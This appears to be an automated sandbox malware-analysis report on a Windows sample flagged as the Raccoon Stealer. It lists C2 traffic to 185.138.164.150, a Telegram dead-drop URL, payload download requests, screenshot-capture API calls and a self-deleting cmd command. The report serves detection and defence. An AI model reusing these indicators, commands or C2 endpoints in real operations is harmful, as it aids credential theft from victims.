00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8

Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327260135.0000000002DB2000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150/
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323065453.0000000002DB2000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150/;r
Source: softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.1.dr	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://ocsp.accv.es0
Source: softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://repository.swisssign.com/0
Source: softokn3.dll.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: softokn3.dll.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: softokn3.dll.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: softokn3.dll.1.dr	String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.1.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.1.dr	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: nssckbi.dll.1.dr	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.1.dr	String found in binary or memory: https://repository.luxtrust.lu0
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.305167317.0000000002D36000.00000004.00000001.sdmp, SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327229599.0000000002D2C000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.305167317.0000000002D36000.00000004.00000001.sdmp, SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327229599.0000000002D2C000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/agrybirdsgamerept
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: https://telegram.org/img/t_logo.png
Source: nssckbi.dll.1.dr	String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.1.dr	String found in binary or memory: https://www.catcert.net/verarrel05
Source: softokn3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0:
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0th
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0de
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150

Source: unknown

DNS traffic detected: queries for: t.me

Source: global traffic	HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic	HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49744 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0042C157 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,

1_2_0042C157

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040E139	1_2_0040E139
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0043E2E4	1_2_0043E2E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0042A2F9	1_2_0042A2F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0043628C	1_2_0043628C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0042C383	1_2_0042C383
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00410648	1_2_00410648
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004206DD	1_2_004206DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040CF54	1_2_0040CF54
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004210B1	1_2_004210B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040F2E6	1_2_0040F2E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004373C6	1_2_004373C6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040D684	1_2_0040D684
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00437819	1_2_00437819
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0041FD36	1_2_0041FD36
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0040BF59	1_2_0040BF59
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0041E014	1_2_0041E014
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0042E110	1_2_0042E110
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0044A480	1_2_0044A480
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0045A4BD	1_2_0045A4BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004484BA	1_2_004484BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0045A5DD	1_2_0045A5DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0046475B	1_2_0046475B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_004187EC	1_2_004187EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0041E857	1_2_0041E857
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0041EBE9	1_2_0041EBE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00422D2B	1_2_00422D2B

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: String function: 0044F0F9 appears 41 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: String function: 00467790 appears 100 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: String function: 00440940 appears 35 times

Source: api-ms-win-core-handle-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.328077326.000000006E63B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamenss3.dll8 vs SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327485031.000000006E502000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: sqlite3.dll.1.dr

Static PE information: Number of sections : 18 > 10

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Virustotal: Detection: 33%
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	ReversingLabs: Detection: 37%

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

File created: C:\Users\user\AppData\LocalLow\sqlite3.dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/67@1/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0042A224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

1_2_0042A224

Source: softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
